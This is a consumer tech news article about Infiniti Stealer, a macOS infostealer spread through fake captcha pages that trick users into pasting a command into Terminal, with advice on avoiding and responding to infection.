Everything you need to know about the malware stealing data from Mac users
Source: Mashable Tech
Mac users have a new malware threat to watch out for. According to a report by Malwarebytes, Infiniti Stealer is a new macOS infostealer that uses social‑engineering tactics and is difficult to detect once installed.
Infiniti Stealer
The campaign begins with a social‑engineering technique known as ClickFix. Victims are typically directed to a malicious website via a phishing email or a pop‑up on a compromised page. The page displays an urgent update warning and asks the user to complete a Cloudflare human‑verification captcha.
After the standard “I am not a robot” checkbox, the page instructs the user to:
- Open Spotlight on their Mac.
- Search for the Terminal app.
- Paste a provided code snippet into Terminal and press Return.
This command downloads and executes the Infiniti Stealer payload.
“Because the user runs the command directly, many traditional defenses are bypassed. There’s no exploit, no malicious attachment, and no drive‑by download.” – Malwarebytes
The delivered malware is written in Python but compiled with Nuitka, producing a native macOS binary. This compilation method makes the stealer harder to analyze and detect.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka‑compiled Python stealer.” – Malwarebytes
Once installed, Infiniti Stealer attempts to steal a variety of data from the victim’s Mac and upload it to the attacker’s server, including:
- Passwords
- Screenshots
- Browser data (cookies, history, etc.)
- Other sensitive information
Be aware of malware threats
- Verify website legitimacy before following any instructions, especially those that require running code in Terminal.
- No legitimate captcha or verification process should ask you to paste commands into Terminal.
- If you are not comfortable with command‑line operations, avoid any process that asks you to do so.
- If you suspect infection, stop using the affected computer immediately. Change your account passwords on a separate, clean device and, if possible, revoke the compromised computer’s access.
Infiniti Stealer reflects a growing trend of attackers targeting Apple devices under the mistaken belief that they are immune to malware. Similar threats include DarkSword, which targets iPhones and other iOS devices without requiring the user to download a malicious file.